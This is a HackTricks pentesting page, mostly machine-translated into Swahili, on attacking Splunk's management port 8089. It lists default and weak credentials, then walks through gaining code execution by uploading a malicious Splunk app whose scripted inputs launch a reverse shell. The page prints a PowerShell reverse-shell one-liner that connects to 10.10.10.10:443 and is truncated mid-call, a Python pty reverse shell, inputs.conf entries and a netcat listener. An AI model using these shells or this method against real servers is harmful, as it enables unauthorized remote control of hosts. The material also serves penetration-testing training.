8089 - Pentesting Splunkd

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Splunk ni chombo cha uchambuzi wa logi ambacho kina jukumu muhimu katika kukusanya, kuchambua, na kuonyesha data. Ingawa kusudi lake la awali halikuwa kutumika kama SIEM (Usimamizi wa Taarifa za Usalama na Matukio), kimepata umaarufu katika eneo la uangalizi wa usalama na uchambuzi wa biashara.

Mifumo ya Splunk mara nyingi hutumiwa kuhifadhi data nyeti na inaweza kuwa chanzo muhimu cha taarifa kwa washambuliaji wanaoweza kuweza kuingilia mfumo. Bandari ya default: 8089

PORT     STATE SERVICE VERSION
8089/tcp open  http    Splunkd httpd

Seva ya Splunk web inafanya kazi kwa msingi kwenye bandari 8000.

Uainishaji

Toleo la Bure

Jaribio la Splunk Enterprise linabadilika kuwa toleo la bure baada ya siku 60, ambalo halihitaji uthibitisho. Si jambo la kawaida kwa wasimamizi wa mifumo kufunga jaribio la Splunk ili kulijaribu, ambalo baadaye linasahaulika. Hii itabadilika moja kwa moja kuwa toleo la bure ambalo halina aina yoyote ya uthibitisho, ikileta pengo la usalama katika mazingira. Mashirika mengine yanaweza kuchagua toleo la bure kutokana na vikwazo vya bajeti, bila kuelewa kikamilifu athari za kutokuwa na usimamizi wa mtumiaji/nafasi.

Akikumbuka Kawaida

Katika toleo za zamani za Splunk, akumbukumbu za kawaida ni admin:changeme, ambazo zinaonyeshwa kwa urahisi kwenye ukurasa wa kuingia. Hata hivyo, toleo la hivi karibuni la Splunk linaweka akikumbuka wakati wa mchakato wa usakinishaji. Ikiwa akumbukumbu za kawaida hazifanyi kazi, inafaa kuangalia nywila dhaifu za kawaida kama admin, Welcome, Welcome1, Password123, n.k.

Pata Taarifa

Mara tu tunapokuwa tumeingia kwenye Splunk, tunaweza kuangalia data, kuendesha ripoti, kuunda dashibodi, kusakinisha programu kutoka maktaba ya Splunkbase, na kusakinisha programu za kawaida. Unaweza pia kuendesha msimbo: Splunk ina njia nyingi za kuendesha msimbo, kama vile programu za Django za upande wa seva, REST endpoints, ingizo la skripti, na skripti za arifa. Njia ya kawaida ya kupata utekelezaji wa msimbo wa mbali kwenye seva ya Splunk ni kupitia matumizi ya ingizo la skripti.

Zaidi ya hayo, kwa kuwa Splunk inaweza kusakinishwa kwenye mwenyeji wa Windows au Linux, ingizo la skripti linaweza kuundwa kuendesha Bash, PowerShell, au Batch scripts.

Shodan

Splunk build

RCE

Unda Programu ya Kawaida

Programu ya kawaida inaweza kuendesha Python, Batch, Bash, au PowerShell scripts. Kumbuka kwamba Splunk inakuja na Python iliyosakinishwa, hivyo hata katika mifumo ya Windows utaweza kuendesha msimbo wa python.

Unaweza kutumia hii kifurushi cha Splunk kutusaidia. Kadiria ya bin katika repo hii ina mifano ya Python na PowerShell. Hebu tupitie hii hatua kwa hatua.

Ili kufanikisha hili, kwanza tunahitaji kuunda programu ya kawaida ya Splunk kwa kutumia muundo wa saraka zifuatazo:

tree splunk_shell/

splunk_shell/
├── bin
└── default

The bin directory itakuwa na scripts ambazo tunakusudia kuendesha (katika kesi hii, PowerShell reverse shell), na directory ya default itakuwa na faili yetu ya inputs.conf. Reverse shell yetu itakuwa PowerShell one-liner:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(

Faili la inputs.conf linamwambia Splunk ni script ipi itakayotumika na masharti mengine yoyote. Hapa tunaiweka programu kuwa imewezeshwa na kumwambia Splunk kuendesha script kila sekunde 10. Kipindi hiki kiko daima katika sekunde, na ingizo (script) litaendesha tu ikiwa mipangilio hii ipo.

cat inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Tunahitaji faili ya .bat, ambayo itakimbia wakati programu inatolewa na kutekeleza PowerShell one-liner.

Hatua inayofuata ni kuchagua Install app from file na kupakia programu hiyo.

Kabla ya kupakia programu mbaya ya kawaida, hebu tuanze msikilizaji kwa kutumia Netcat au socat.

sudo nc -lnvp 443

listening on [any] 443 ...

On the Upload app page, click on browse, choose the tarball we created earlier and click Upload. As mara tu tunapopakia programu, a reverse shell is received as the status of the application will automatically be switched to Enabled.

Linux

If we were dealing with a Linux host, we would need to edit the rev.py Python script before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races.

import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumika vibaya ili kupandisha mamlaka na kupata kudumu:

Splunk LPE and Persistence

References

https://academy.hackthebox.com/module/113/section/1213

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Previous8086 - Pentesting InfluxDB Next8333,18333,38333,18444 - Pentesting Bitcoin

Last updated 7 days ago